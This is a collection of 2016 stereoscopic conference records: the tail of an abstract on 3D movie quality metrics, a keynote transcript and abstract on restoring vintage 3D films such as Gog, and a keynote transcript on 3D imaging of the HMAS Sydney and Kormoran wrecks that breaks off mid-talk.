nearly the worst technical quality. A more important conclusion from the analysis, however, is that it gradually becomes possible to produce low-budget movies with excellent technical quality, that was previously within reach only for high-budget blockbusters. We hope that new objective quality metrics like the channel mismatch metric will find their applications in production pipelines. It can further decrease the number of viewers experiencing discomfort and give a start to the new surge of S3D popularity. 4) CONCLUSION: Objective S3D quality metrics make it easier to find problematic frames or entire shots in movies, that could potentially lead to discomfort of a significant fraction of the audience. Our analysis have already revealed thousands of such scenes in real S3D movies. But to directly estimate this discomfort subjective evaluations are necessary. We have organized several of such evaluations with the help of volunteers, that were asked to watch some of the scenes with the worst technical quality according to our analysis. These experiments allow us to further improve the metrics and to develop a universal metric that could directly predict a percentage of the audience experiencing a noticeable discomfort. It is already clear that the development of such universal metric is a very challenging problem, so we are looking for collaboration. It is also clear to us that the majority of problems could be fixed in post-production with minimal user intervention, if not entirely automatically. Some of these techniques are not widely employed just because the problem itself is not considered important enough to require correction. We hope our work could help shed the light on the problem and more attention will be drawn to correcting the S3D production issues. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32256 (DOI)
|
Welcome everyone to the second keynote for the stereoscopic displays and applications conference. The title of the presentation is 3D movie rarities. The presenters are Bob Fermanic and Greg Kintz. Now, Bob's had a bit of a just a health hiccup, so he wasn't able to travel at a rather short notice. So Greg Kintz is very kindly agreed to stand in as a sole presenter rather than a joint presenter. Greg Kintz has been working with 3D for, well he says nearly 15 years but I'm sure it's more than that. It's been more than that. Yes. With the archive, yes. Oh, with the archive, of course, yes. I've known Greg since he was working for one of the TV stations and has been keenly interested in 3D through all of that period and got involved with Bob Fermanic and the 3D movie archive, sorry, the 3D film archive and has since been working on a number of restorations including Dragonfly Squadron, the bubble, the 3D rarities which we're discussing today and in fact we've got some of that disc for some of the awards that we're giving away on Wednesday afternoon and also the mask. So it's incredibly important work. Once you lose these films, they're gone forever. So these are a very important part of the history of stereoscopic imaging. So at that point I'll hand over to Greg. Thank you. Hey. As the inter mentioned, I'm the technical director for the 3D film archive and Bob really does wish he could be here today. He's the founder of the archive and he started out which we'll discuss later back in the early 70s and 80s when 3D films were not being taken care of and considered a bygone thing. I'll do my best to try to stand in his shoes and convey the efforts that we continue to do to save these features and preserve our stereoscopic film heritage. We both share an immense love and appreciation for this amazing art form and the dire need to save these films. So let's get started. The first documented public exhibition of a 3D feature took place on June 10th, 1915 at the New York Aster Theater in Times Square. Only three reels of test footage were shown and by all accounts it was on a dual 35 millimeter projected system in anaglyphic form. The test footage was on nitrate stock which nitrate by today's standards is considered very flammable and not something you'd want to keep around at least in normal conditions. Original trade magazine reports indicate there were motion artifacts and most likely that was either due to the dual projection system being out of sync or it was due to original phasing issues in the original dual camera rig. We'll probably never know the footage which was shot almost 101 years ago does not survive and unfortunately was not considered important by its presenters. About 1922 color film stocks which have been developed which allowed for anaglyphic printing on one strip of 35 millimeter film and there were a number of shorts shown theatrically in the mid 1920s. The first 3D feature ever was the power of love. Sadly, these pioneering stereoscopic productions are gone with the victim of studio apathy and again volatile nitrate film stock which was highly encouraged to be destroyed for a period of time. However, we have been able to preserve the earliest extant footage from the 1922 Kelly's Plasticon features. This remarkable 3D footage of Washington in New York City has been restored and extracted from the original anaglyph in left right form and is now available on our 3D rarities blu-ray collection from Flickr Alley. The anaglyphic shorts were a novelty and fell out of favor by 1926. 
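For illustration only: the basic reason such an extraction is possible at all is that an anaglyph print stores the two eyes' images in different colour channels, so a rough first separation is simply a channel split, as sketched below. The actual restoration of this material involved far more than this, and which eye sits in which channel depends on the particular print; both are assumptions here.

# Basic principle only: rough left/right separation from a red/cyan anaglyph.
import numpy as np

def split_anaglyph(anaglyph_rgb, left_is_red=True):
    """anaglyph_rgb: HxWx3 uint8 image. Returns two grayscale views.
    Which eye sits in the red channel depends on the print (assumed here)."""
    red = anaglyph_rgb[..., 0]
    cyan = anaglyph_rgb[..., 1:].mean(axis=-1).astype(np.uint8)  # green + blue
    return (red, cyan) if left_is_red else (cyan, red)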
Not much was heard from 3D over the next decade but exciting things were happening behind the scenes. Edward H. Land was a scientist and inventor and he co-founded the Polaroidcom Corporation. He developed a new method of polarization that could be applied to motion picture film leading to the first public exhibition of polarized 3D which took place on January 30th, 1936 in New York City. The polarized 3D system demonstrated by Land 80 years ago at its core is not too unlike the systems used today in IMAX film based 3D presentation which are still for the film based systems dual projection and linear polarized. The advent of polarized 3D projection allowed for sharper images with less potential crosstalk that also introduced the possibility of full color stereoscopic images. It is this new beginning in 3D film history that we'll be looking at here soon in the first part of our presentation. Thrills for You was the first polarized 3D film shown on the West Coast when it opened here at the Golden Gate International exhibition in May of 1940 and in a few minutes after 75 years it will return home and play here again. This Pennsylvania Railroad short was expertly photographed and for a film shot in 1940 you'll quickly see how the early stereoscopic features expertly used 3D staging. They watched their parallax budget and overall framing in order to have 3D actually enhance the film versus simply being used as a gimmick. Be sure to watch the last shot even with the clever editing. You'll see that Norelean 3D camera rig is probably a little too close to the tracks. So that's one of my favorites. The next feature in our presentation is New Dimensions which is historically significant as the first domestic full color polarized film. It opened in New York's World Fair in May 1940 and marked the first time a color polarized 3D film was shown publicly. The stop motion assembly of a full size Plymouth took nine weeks to photograph and by the end of the fair in October of that year 4.5 million viewers had seen the film. Regrettably the elements for this entertaining and historically significant film were terribly neglected. In 1953 RKO acquired the rights and decided for theatrical release it would be edited down and the trims were discarded. The shortened version was released in the early 1950s as motor rhythm. 3D film founder Bob Furmanek rescued the only surviving left right elements but they were rapidly deteriorating with vinegar syndrome, a process that breaks down the base of the film and eventually destroys it. Knowing this was a vital one of a kind element in time was of the essence. Bob had wet gate 4K scans made of the archival element. That process ended up taking numerous passes to capture the shortened entirety because the scanner which was a 4K wet gate scanner and one of the top in the country was having problems due to the shrinkage as the film was deteriorating. So we had to do a number of passes to get the complete feature intact. In order to restore the film to its original 1940 version Bob located the only surviving 1940 opening and closing sections in a 16 millimeter print. We have now restored and preserved new dimensions in its original complete edit as first shown in the World's Fair in 1940. And on a side note you'll see those bookend segments having a slight drop in deterioration being from an archival element 35 millimeter which is the main body of the feature to the bookend segments which are 16 millimeter. 
I should mention that both of the shorts you're about to see were done by John Norling and Jacob Leventhal, two pioneers whose work in stereoscopic motion picture of the field date back to the early 1920s. After the two shorts I'll do a quick rundown on the archives history to some of the myths we've had to combat along the way and I'll discuss some of our recent restoration projects. 75 years ago looking as good as it does and the technical work done behind that. Just a quick heads up if any of you guys are thinking about some of those amazing polarized tricks don't tear up your glasses yet because we have some more coming up here soon. Going on the golden age features of the 1950s highlight a variety of comparisons in today's state of the art 3D digital fair but each time period in 3D we feel is unique. The vintage 3D titles offered more parallax thanks to wider interaxial settings and in addition the 1940s and 50s features tended to have longer takes and not as rapid cut editing as today's features do and that also allowed for wider parallaxes to be viewed more comfortably and easily and allowed for better staging. Contrary to popular cultural references have existed since the early 1980s every single one of the 1950s domestic golden age features were shot in digital interlock dual 35 millimeter 3D. In tradition of 3D public relations it seems part of any upgrade in 3D technology has included an underlying need to dismiss all previous attempts and to that end we have strived to set the record straight. Most of the vintage 3D titles have had A-list stars such as John Wayne, Vincent Price, Robert Mitchum, Barbara Stanwyck, Dean Martin and Jerry Lewis, Edward G. Robinson and Rita Hayworth. Just to name a few legendary directors also just a few Raul Walsh, Douglas Sirk and Alfred Hitchcock all worked on 3D features. Typically the production budgets were on par with their 2D counterparts and even lower budgeted 3D features showed great thought and care in their 3D production values. The primary culprit in the rapid decline of the box office was the theatrical projection. In the fall of 1953 Polaroid field studies determined that nearly 50% of all 3D presentations were there shown out of phase or out of sync. And to put that into further context if you have a film one frame out of sync that can already cause eye strain and irritation you get two frames out of sync and then you start having some serious problems and a number of features were actually halted midway through and run in 2D. And the premier theater which Dial-In for Murder ran at for the reviewers the 3D projectionist had issues, ran it out of sync, ran the other half flat, the reviewer tore it up and Warner Brothers said we advise that you run Dial-In flat. So even the shutters on the projectors had to be precisely in phase. If they weren't in phase as you've probably seen before you know you can have a watery effect with motion. After the audience had been burned out a few times they were not ready to go back and pay money and get more headaches and Polaroid to their credit had worked on synchronizers and aids to help projectionists but by that time the damage had been done. Just to explain on how the 3D archive began in the 1970s nearly a dozen golden age features were converted to anaglyphic form for theatrical release, television broadcast and home video on Betamax and VHS. The vastly inferior anaglyph conversions were easier to present and required far less technical expertise. 
This began as early as the 1970s when Universal released it came from outer space and Creature from the Black Lagoon. The plus side is you don't need a silver screen, you don't need special equipment. The downside of course is it was anaglyph. And as a result the surviving dual strip 35 millimeter prints began to disappear and Bob had seen that trend in 1978 he was able to watch it came from outer space in dual 35 millimeter and polarized 3D and a year later it ended up not being the case but he was told there was a new print that only required cheap red and blue glasses and no special equipment was needed. So Bob starting in 1980 he recognized the disturbing trend to do what the other studios had not the foresight to do. He began actively seeking out and preserving these precious dual strip prints and elements often at great cost and personal expense. He accumulated a large number of left right prints in order to assemble a complete 3D pair and to spell that out even better the left right prints had a soundtrack so they could literally be split apart for second run theaters and you doubled your amount of prints for a given title and in the process sometimes real one and real two might be left then it goes to right and in situations where there were no 3D elements available Bob would buy it prints in the hopes of finding a given real. He accumulated a large number of left right prints in the effort to assemble a complete 3D pairs as many were separated as I mentioned in their 2D run. Many of Bob's discoveries and restorations are still one of a kind it would not survive today if it wasn't for his efforts and ultimate creation of the 3D film archive by 2003 the 50th anniversary of the 3D boom the archive held the largest collection of vintage stereoscopic film elements in the world. Our collective goal has always been the same to not only preserve these titles but to have them available to the public and presented better than ever before without the constraints of analog film alignment issues. What once took several optical generations on film can now be done better and with no loss of quality in the digital realm. The same applies for left right level matching which was harder to achieve in the film domain. Each of our 3D restorations has literally been a shot by shot alignment issue or alignment corrections fixing not only vertical and sizing issues but also addressing various geometric distortions that could be introduced by the camera rig or somewhere in the post production chain titles that we have restored include the bubble dragonfly squadron the mask 3D rarities and more to follow all are currently available on 3D blu-ray. We've worked with and advised various studios on their stereoscopic assets. Our most recent restoration was also our toughest. You'll soon see a sample of the obstacles that we had to face on our last latest restoration which is a 1954 sci-fi drama called Gog and it actually goes further than our restoration efforts in that the film the rights to it were sold just a few years after it ran in 1954 and as a result of that the original left eye camera negative and all remaining elements were destroyed and Bob Furmanek in I want to say 2000 2001 almost 50 years after the feature first ran in 3D discovered the sole surviving left eye print. That was the good news of the bad news was the left eye was in path a color which for anybody out there who's in the film know they know that path a fades and fades badly. 
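As a minimal illustration of the kind of shot-by-shot left/right alignment measurement described above (and not the archive's actual toolchain), the relative rotation, scale and vertical offset between two views can be estimated from sparse feature matches; all parameter choices below are assumptions.

# Illustrative sketch: measure geometric mismatch between left and right frames.
import cv2
import numpy as np

def measure_geometric_mismatch(left_gray, right_gray):
    """Estimate relative rotation (degrees), scale and vertical offset (pixels)
    between the two views from sparse ORB feature matches."""
    orb = cv2.ORB_create(2000)
    kpl, desl = orb.detectAndCompute(left_gray, None)
    kpr, desr = orb.detectAndCompute(right_gray, None)
    matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
    matches = sorted(matcher.match(desr, desl), key=lambda m: m.distance)[:500]
    src = np.float32([kpr[m.queryIdx].pt for m in matches])   # right-view points
    dst = np.float32([kpl[m.trainIdx].pt for m in matches])   # left-view points
    # Similarity transform right -> left (rotation + uniform scale + translation).
    M, _ = cv2.estimateAffinePartial2D(src, dst, method=cv2.RANSAC)
    if M is None:
        raise RuntimeError("not enough reliable matches")
    return {
        "rotation_deg": float(np.degrees(np.arctan2(M[1, 0], M[0, 0]))),
        "scale": float(np.hypot(M[0, 0], M[1, 0])),
        "vertical_shift_px": float(M[1, 2]),
    }

A correction step would then warp one view by the inverse of the rotation, scale and vertical components while leaving the horizontal parallax itself untouched, since that carries the depth signal.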
So when we had a chance to do our restoration we knew we were going to have a daunting task ahead of us, and you'll see that here soon. And following the Gog restoration demo is an outstanding Ann Miller sequence from the classic 1954 MGM musical Kiss Me Kate. It was a tremendous box office hit and we were proud to consult with Warner Brothers on this restoration. Kate is available on 3D Blu-ray and is highly recommended thanks to the hard work of Ned Price and the Warner Brothers motion picture imaging division. Hi, my name is Greg Kintz, I'm the technical director for the 3D Film Archive. I hope you have your 3D glasses handy as we go through some of the hurdles we went through restoring the 1954 3D classic Gog. Hi, I'm Bob Furmanek, founder of the 3D Film Archive. Like all the 1950s 3D films, Gog was shot in dual strip 35 millimeter and exhibited in dual projection 35 millimeter and polarized 3D. It was filmed with the Natural Vision 3D rig which was used to film such 3D classics as Bwana Devil, House of Wax, The Charge at Feather River and several others. The plus side of twin 35 millimeter 3D is the quality is essentially the same as standard 2D 35 millimeter, and either of the two release prints can easily be shown flat if needed. This was also the downfall, as both left and right release prints and archival elements could easily be split up, or one side of the master elements could eventually be discarded. This ended up being the sad case for Gog, where after its initial run in 1954 all 35 millimeter left eye prints and archival elements would essentially disappear. Outside of some very compromised 16 millimeter elements, literally all high quality left eye 35 millimeter elements of this feature were considered lost for almost 50 years. In 2001 we found the only surviving 35 millimeter left side element of Gog. It was an original 1954 Pathécolor release print and it was totally faded red. That left side was paired up with a right side print that had better color, and it was shown in 3D for the first time in more than half a century at the World 3D Film Expo in Hollywood. Director Herbert L. Strock was very proud of his work on the film. Much like the one-eyed director Andre De Toth, Herbert Strock suffered from monocular vision, and because of this he relied heavily on Lothrop Worth for overall stereoscopic compositions and advice. In later interviews Lothrop Worth would consider this one of his best 3D features. By the time Gog went into production in September of 1953, the Natural Vision rigs had their viewfinders configured for widescreen framing and many of the technical issues found in earlier Natural Vision features had been resolved. Again paralleling the feature House of Wax, Lothrop Worth made sure that Gog relied on well thought out stereoscopic parameters such as staging, color and camera positioning to highlight depth while still utilizing out-of-screen effects that were woven into the storyline. After its original theatrical run in vibrant color widescreen 3D, Gog suffered through less than ideal presentations in the upcoming decades, often being shown on television in black and white, improperly framed and taken from subpar prints. It was never again shown in proper widescreen or 3D. The recovery of this lost 35mm element was a true cause for celebration, but it was also very apparent that this left eye print was turning pink and any trace of remaining color was fading rapidly.
In 2015 the archive was asked by Kino Lorber to begin restoration work for a 3D Blu-ray release and we requested new scans. The last transfer of the right eye had been done in the 1990s in standard definition so Kino was able to secure MGM's archival right side IP for a new HD scan. MGM had recognized the need to preserve this 35mm left side and with the cooperation of David Packard and the UCLA Film and Television Archive they were able to make a new scan of the last 35mm left print. Gog was shown on television in a modified full frame flat black and white version and it was obvious that that was never the intended aspect ratio. When we did new scans of the archival elements microphones set pieces and various hard matted stock shots shown that the film was clearly intended for widescreen presentation. With some finesse the archival right eye IP print cleaned up extremely well but the left eye print was in bad shape and simply borrowing color from the right eye was not an option. Using our various stereoscopic recovery methods which we've refined over the last 15 years we worked first on recovering some basic color back in the left eye side and then spent considerable passes refining that process. While it is not always 100% match I'm sure you'll agree the end result was nevertheless a night and day difference over the original surviving left eye release print. We've also worked on recovering some lost blown out detail that is present in MGM's right eye inner positive archival element. Another unique trait that only survives in the left eye release print is an additional 3D production credit during the opening titles that is absent in all other surviving elements. This omission has been reinstated into the restored 3D and 2D versions. In late August of 53 interest in 3D was starting to decline primarily from sloppy presentations. Shortly before cameras rolled on GOG Gunsberg suggested to producers that all 3D features begin with flat titles. This would help projectionists to frame left right prints correctly and reduce chance of eye strength. Both the left and right eye elements had their share of dirt and damage sections as well and thanks to the additional assistance of Fad Kamarowski these issues have largely been eliminated. When I was a kid seeing GOG in 3D was a holy grail. The only way you could see it at that time on television was flat black and white full frame and it robbed the film of all the special qualities that make it such a high quality and unique 3D feature. When we found the print in 2001 we weren't sure we could ever restore the color to it and bring it back to the quality that exists now. So it's a real thrill for Greg Kintz and myself to be able to present GOG to you as Herbert Elstrak and his entire creative team intended. Thank you very much and enjoy GOG. Good stuff. Yeah in my opinion Kiss Me Kate's one of the best 3D movies from the 50s. Right now I'll open this up for questions. Well I might just finish off by saying this is we're so privileged to be able to see these old features better than they were ever seen in theaters. So thank you for the work for you doing. Please join me in thanking Greg for his presentation.
|
Stereoscopic motion pictures have existed for 100 years, and the 3-D Film Archive - founded in 1990 - has a key role in saving and preserving these historic elements. Greg Kintz will discuss the many obstacles and challenges in locating and saving these precious stereo images. For example, their scanning, panel-matching, and stereoscopic image matching techniques have been widely recognized for their efficiency and precision. As Greg will present, the full restoration process begins with 2k or 4k wet-gate scanning of the best surviving 35 mm elements. The films are then aligned, shot-by-shot, for precise alignment and panel matching of the left / right elements. The 3-D Film Archive's multi-step process also includes image stabilization, flicker reduction, color balance, and dirt clean-up. At one time, the 3-D Film Archive held the largest collection of vintage stereoscopic film elements in the world. As such, Greg will display some of his favorite clips on the SD&A stereoscopic projection screen. In addition, the Archive's first four releases on Blu-ray 3D have enjoyed acclaim: Dragonfly Squadron, The Bubble, 3-D Rarities, and The Mask. For the first time, contemporary viewers are able to see these films at home in quality equal to or greater than the original theatrical experience. Greg will also discuss how the Archive is working to save and restore additional Golden Age 3-D films through licensing and partnerships. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32257 (DOI)
|
So, our next speaker is the keynote speaker for the first keynote speaker for the conference this year. He may be well known to many of you unless you came in the last two years because he wasn't here. But he was very busy doing what he's going to talk about this afternoon, which is the two ship wrecks, two and a half thousand meters underwater with six 3D cameras. Dr. Woods is a research engineer at the Center for Marine Science and Technology. And as of two years ago, manager of the high facility, the two, which is a very nice 3D display system. It says here he has a strong background in stereoscopic 3D imaging. I think he has an excellent background in stereoscopic 3D imaging, not just a strong background. And if you have any questions about stereoscopic 3D, sit next to him at the dinner tonight and ask away. And he's done lots of things which we're going to learn about right now, I believe. Andrew. So, thank you, Nick, for the introduction. My talk today will be about a project I've been working on for the past four years and was the result or was the cause of me not being able to attend the last two conferences. So that had a negative effect on my attendance percentage. Prior to that, it was every conference but two. Now it's every conference but four, which makes it 23. All right, so I'll be talking today about a project relating to shipwrecks, the HMA of Sydney II and the German vessel, the Cormorant, which are sitting at 2,500 metres underwater and we took a huge suite of equipment to conduct a 3D imaging survey of the two vessels. Taking you back to World War II, the 19th of November in 1941. This is just a few weeks before Pearl Harbor. These two ships were in the Indian Ocean and unlikely encounter it was. No one expected a German raider to be located in this part of the world, on the west coast of Western Australia. The German vessel, the Cormorant, was trying to establish basically a bit of a distraction from what was occurring in Europe so that the Allies could not just send all of their vessels to Europe to fight the war there. So the Cormorant was moving around, creating a bit of distraction and ensuring that the navies around the world had to keep some of their vessels in the home waters. So the Cormorant was a merchant vessel originally and it was outfitted with a wide range of heavy artillery. The Sydney II in contrast was specifically built in Newcastle upon Tyne, Nick, to be a leading class warship of the time. The German vessel was at the time getting ready to lay some mines in a port on the west Australian coast and the Sydney was heading down south, heading down from Singapore, heading back down to Fremantle and encountered this unusual vessel that was out of the normal shipping lanes. Cutting a long story short, basically a very short and violent action occurred resulting in the sinking of both vessels. This is the crew of the HMAS Sydney just after it had a very glorious win in the Mediterranean. Most of these crew, but certainly all of the crew that were on the vessel at the time of the encounter with the Cormorant, perished 645 souls. Whereas on the Cormorant they were carrying 380 and of those 318 survived. So there was 70 years of controversy and rumour about what had actually happened on that day. The Sydney was on in radio silence at the time it went down, so there was no radio communication to indicate why it had gone missing. And when search party was sent out for it, the search parties only found German survivors. 
The two ships were found in 2008 by a consortium called the Finding Sydney Foundation and supported by a range of different contributors, including the federal government. The two vessels were found here on the West Australian coast. So Perth is way down here, Singapore is up here somewhere and the location where they were found was just here. They were planning, the Cormorant was planning on laying mines in this harbour here called Canarvon. And the locations, the exact locations of the two wrecks were found around 200 kilometres off the coast and around 20 kilometres apart from each other. So the action occurred obviously together and as part of the process that the Sydney sailed over the horizon away from the Cormorant which was disabled but eventually it sank as well. This is a side scan sonar image of the Cormorant site. The main wreck is sitting right here. There's a whole lot of debris in this region here which looks like just salt and pepper on a side sans sonar image and rather bizarrely the engine is sitting over here. The reason for this rather unusual arrangement of the site is that the Cormorant was carrying 300 sea mines and its crew scuttled the vessel before they abandoned ship and those sea mines went up in a huge explosion which just tore the vessel apart. The Cormorant, what's left of the Cormorant is about 40% of the vessel, the bow section sitting nicely upright on the sea floor but the rest of it is just this torn metal and just lots of little pieces. The Sydney is a very different site, bit more compact. The main hull is here, around probably 95% of the vessel is still in one piece. The bow is sitting upside down further up in the debris field about 300 metres away. The Sydney was hit by a torpedo from the Cormorant and that damage eventually led to the separation of the bow from the main hull and then there's a whole lot of other items on the sea floor which got essentially torn off the superstructure of the vessel as it went down. It's a very violent action, you might think of it being nice and gentle sinking process but no, it's actually quite violent with lots of movement and the items just being torn off the superstructure. So the 2008 expedition which found the two vessels, again they sunk in 1941 so it was almost 70 years before they were finally located, was very successful in its aim of finding the two vessels. They also sent an underwater vehicle down called an ROV and collected around 1500 images and around 40 hours of video and that information fed into a commission of inquiry which was ruled on the loss of the two vessels and one of the scientific organisations in Australia, DSTO also performed a detailed analysis on all the damage which was visible on the two vessels as well. When we went to look at the archive that was collected we realised that although it was useful for that purpose, for any subsequent purpose such as a museum exhibition or 3D processing, the still images were relatively low resolution, 5 megapixel but the lighting was relatively low so there was a lot of blurring as well and the video was only standard definition so 0.3 of a megapixel and the lighting again was not sufficient to provide good quality vision and that was also corrupted by noise and interference. So there was a desire from my colleague and myself, Andrew Hutchison and myself to mount a mission to return to the two wrecks to image them in considerable detail. 
So rolling forward to 2015, after four years of toil after the initial seed of the thought to conduct this project, we conducted the expedition in April, May of last year to return the two wrecks. Our aim was to image the wrecks in exquisite detail. It's an extremely rare and valuable opportunity to return to these two wrecks so we wanted to really image them in such detail in so many different ways that we would be able to generate lots of different data products from the project. Absolutely key to the project was this vessel here provided by an offshore oil and gas services company called Dof Subsea. This is the Scandi Protector, the latest in offshore oil and gas vessel, 100 berths, helicopter pad, huge back deck, huge crane and importantly for us, two underwater vehicles, wood class, the top of the range for their capability as well. The existing lighting and camera systems that are used on these vehicles for normal oil and gas operations were not quite the level and brightness and resolution that we were wanting for our mission. So I led the development of a very complicated custom lighting and camera system to be fitted to the front of both of these vehicles and I'll spend the next few slides going in detail through those. We also had a multi-beam sonar on the, on the, on the ROV, one of the ROVs as well which allowed us to capture images such as this. This is a multi-beam scan of the HMAS Sydney. You can see the torn off bow on this end here and this mission to return to the two wrecks also provided a unique opportunity to allow us to collect some science samples as well and we collected rusticles, we collected push cores, water samples and also some biological samples as well. The core project team were from Curtin University, Andrew Hutchison, myself, Joshua Hollick and Tim Meistwood from the Western Stran Museum led their activities, their involvement. So each of the two ROVs as I mentioned were equipped with a custom 3D imaging system. The ROV is what's sitting behind here. There's a, what looks a bit like a top hat sitting on the top here with, which is what's called a tether management system and there's a big reel of umbilical cable on there. The system that we attached to the front of these two vehicles consisted of 10 underwater LED lights. The ROV had three kilowatts of power available in its lighting circuit so we used all of that. And produced roughly 200,000 lumens of light. We also fitted seven digital steel cameras to the front of the vehicle. It's quite rare to have a, or a single digital steel camera on an ROV, surprisingly. So we had seven on each. Two 3D high definition video cameras. I should also mention that one of, or two of the digital steel cameras were mounted as a stereo pair. There's not enough plugs on a regular ROV for those mini cameras so we also had to have some subsea interface bottles. This one here is for interfacing all of the camera systems and these two housings here for the lighting distribution. All of that was mounted on a special frame. The frame was hydraulically controlled so that it could be either oriented vertically, for example when we were filming the hull of the vessel or it could be lent forward at 45 degrees when we were photographing the superstructure of the vessel or flying across the items in the debris field. Of course there was two of these. It was a hell of a lot of equipment and we had a scary amount of underwater cable as well that joined all of these different systems together. 
Now to go into a bit more detail into the camera systems that we used, I guess this is a bit like camera porn for stereographers. On the first ROV we had a Kongsberg Full HD 3D high definition video camera. On the second ROV we had a 3D high definition video camera from Bowtech. On both ROVs we had a secondary 3D high definition camera from a company called Subsea Imaging near Halifax in Canada. We also developed our own 3D digital still camera for the project as well. The top cameras provided a live 3D high definition feed up to the surface and those recorded continuously. We had boxes and boxes of hard drives. The second ROV cameras provided additional capability as well as redundancy in case we had a problem, we also had these ones provided 3D zoom, provided a standard definition preview to the surface but recorded internally so we had 47 hours of recording capacity on those. These particular cameras here were capturing a stereo pair every five seconds and were recording to internal memory as well. A little bit more of a look at each of the cameras here. The Kongsberg camera outputs what's known as a HD STI output, full high definition, 1920 x 1080. This one's got a lens separation of about 60mm and a 3000m depth rating. At this depth, 2,500m, it's a substantial pressure so you need high quality housings. This one here was made out of titanium. The camera from Bautek is a slightly wider lens separation, 76mm, fairly wide field of view, this one's rated for 4000m and again made of titanium. The cameras from Subsea Imaging, they're based on a Sony 3D camera module and that has a 32mm camera separation and one of these had a stainless steel housing and the other one had a titanium housing and again rated for roughly 3000m. And then this camera here, quite a bit heavier because it was made out of stainless steel, about 10kg in air but also rated for 3000m and captured images with about 75mm separation and 12MP resolution. So that's all the 3D cameras and then we also had these digital steel cameras as well. These are a 10MP digital steel camera also from Kongsburg. These cameras have an ethernet interface so we had full data control and download from the cameras. One of the aspects we were quite proud of, we developed some, more specifically my colleague Joshua Hollick, developed some customised code which allowed us to have real time download of raw images from the cameras in real time and everything was capturing digital steel images at 5 images per second and these also have zoom capability. And to that we also had some digital, wide angle digital steel cameras again at a 5 second interval and these ones were recording internally. And the wide angle provides additional 3D reconstruction geometry capability which I'll mention a little bit more a bit later. And the ROVs are outfitted with some existing video cameras as well so we were recording much of that content as well. So that's the subsea end up on the surface on the vessel. We had a control room. This particular room was empty when we arrived and within 12 hours we had all of this set up and running. So it's broken down into several stations or consoles. We've got a control system here or a control station here for the lights and cameras on ROV1. Three laptops controlling a range of different functions, controlling the lights, controlling the cameras and an image preview function here so we can see the images as they were downloading from the Ethernet connected cameras. 
And we also had a video preview of the other cameras and then a live high definition 3D video feed on this particular monitor here. Then that configuration was repeated here for the second ROV control station. Another station here for the high definition video recording and data storage. And then a third console over in the corner there for data validation and some initial data processing to ensure that the data we were collecting was up to scratch. Over behind this wall is the actual room where the ROVs themselves are flown. There's the control station for ROV1, two pilots and a whole lot of different video monitors showing all sorts of different video feeds and control status. On the other side of the room behind the camera is the control station for ROV2 and on the left is the navigation control station. So it's a bit like mission control. Of course gluing all of this equipment together was the crew. We had a wonderful team. We had 20 people as part of the Curtin and WA Museum team running the imaging systems. There's another 20 people who run the ROVs and then another 20 or so people who run the vessel. So a team of approximately 63 on board. We were at sea for nine days. Four of those were actually diving on the two wrecks. So it was a very busy operation. Bringing this all together was a huge effort. We were very pleased with the amount of support we had from industry. So many different companies from the oil and gas industry were very keen to be involved. It was such a uniquely different project from what they would normally be working on, and they were very keen to see their services and products being demonstrated in a non-oil and gas type of application. So the primary project partners were the Western Australian Museum, Curtin University, DOF Subsea who provided the vessel, and we also received a grant from the federal government. So in terms of the results of the expedition, as I mentioned, we had two ROVs working for four days straight diving on the two vessels, 24-hour operations, and we had 12-hour rotating shifts. Over that period of four days we surveyed both wreck hulls and also sections of the debris fields. We had to carefully coordinate the movement of the two ROVs. Sometimes they were working together, sometimes working separately. So as I mentioned before, seven digital still cameras on each ROV were capturing photos every five seconds and most of the time 3D high definition was being captured from the two vehicles as well. So at the end of the mission we had over half a million photographs, around 300 hours of high definition video, much of that in 3D, and about 50 terabytes of data we wheeled off the vessel. Now I'd like to give you a little bit of an insight into some of the material we collected. We do have much of this content in 3D but we're still going through the process of processing that data. This is the B turret on the HMAS Sydney. With this image here you can see the deadly accuracy of the German gunners; the top of the turret was blown off there and that disabled that particular turret very quickly. This is the stern of the HMAS Sydney, you can see the other ROV working above it. It was quite a unique opportunity to have two ROVs working on site, so you could actually film one ROV with the other ROV and provide context as to the actual operations that were taking place. You can see the compression damage that's occurred as the ship has sunk; it's become squeezed by the incredible pressure at that depth. 
This is looking into the guts of the torn off bow of the Sydney, looking over the shoulder of the ROV. You can see some of the anchor chains, the torn metal, you can even see some of the rusticles that you'll have a little bit of a closer view of a little bit later. You can see the lights on the ROV there and some of the cameras. So the bow, which is this section here, is sitting upside down on the sea floor. In contrast to the hull of the Sydney and the hull of the Kormoran, both of those are sitting upright whereas the bow is sitting upside down. This is an item from the debris field, it's a life raft, something called a Carley float. Obviously significantly degraded in 70 years. It's not something I would have wanted to have tried to survive in. It's essentially a wooden slatted floor which is connected to the buoyancy ring by a series of ropes. The bottom of your body would be essentially sitting in the water, so hypothermia would set in very quickly. This is from the Kormoran, a very different site, quite pretty in some ways because of these sea anemones. We're still sort of working out our measurement accuracy but we think some of the large ones at least are in the order of 20 to 30 centimetres in diameter, almost alien like. You can see the original paintwork on the Kormoran. You can see some of the rusticles just there. The two ships are in amazingly good condition despite having been in the ocean for 70 years. That is in part due to the fact that they've been sitting so deep and the water at that depth is essentially very oxygen-starved. As I mentioned before, the Kormoran was carrying around 300 sea mines. Most of them were detonated when the ship was scuttled. This one obviously didn't. We kept our distance when we saw this one but took lots of photos. You can see that this sea mine itself has incurred some compression damage as it's sunk with the vessel. This is sitting on some of the torn up debris in the debris field. This is my favourite image from the whole collection. This is one of the guns on the Kormoran. It shows the amazing clarity of the water that we were blessed with that day. It also shows the sharpness and the clarity of the photography. You can see what's called the rifling in the end of the barrel there that gives the projectile a spin to improve its accuracy. It also shows a bit of the personality of the crew on board. They've named the gun Linda. There's also some German text around here which very roughly translates to mean victory for us and death to the enemy. Of course the skull and crossbones for added effect. We mentioned that we took a lot of photos. Why did we take so many photos? Well, it's for the process called 3D reconstruction. This technology is making so many inroads into so many fields. The plenary talk just earlier, on optical coherence tomography, also talked about using 3D reconstruction, and it is a very capable and fast developing field. It's one of the technologies that we're making very good use of in this project. The purpose of 3D reconstruction is to generate 3D models from a series of 2D photographs. This image here shows one of the ship's boats. These were not life boats. These were intended to transfer personnel and stores between ship and shore. Each of these blue rectangles here with a black line sticking out of the back of it represents a camera image. So we flew the ROV down and went around it once. 
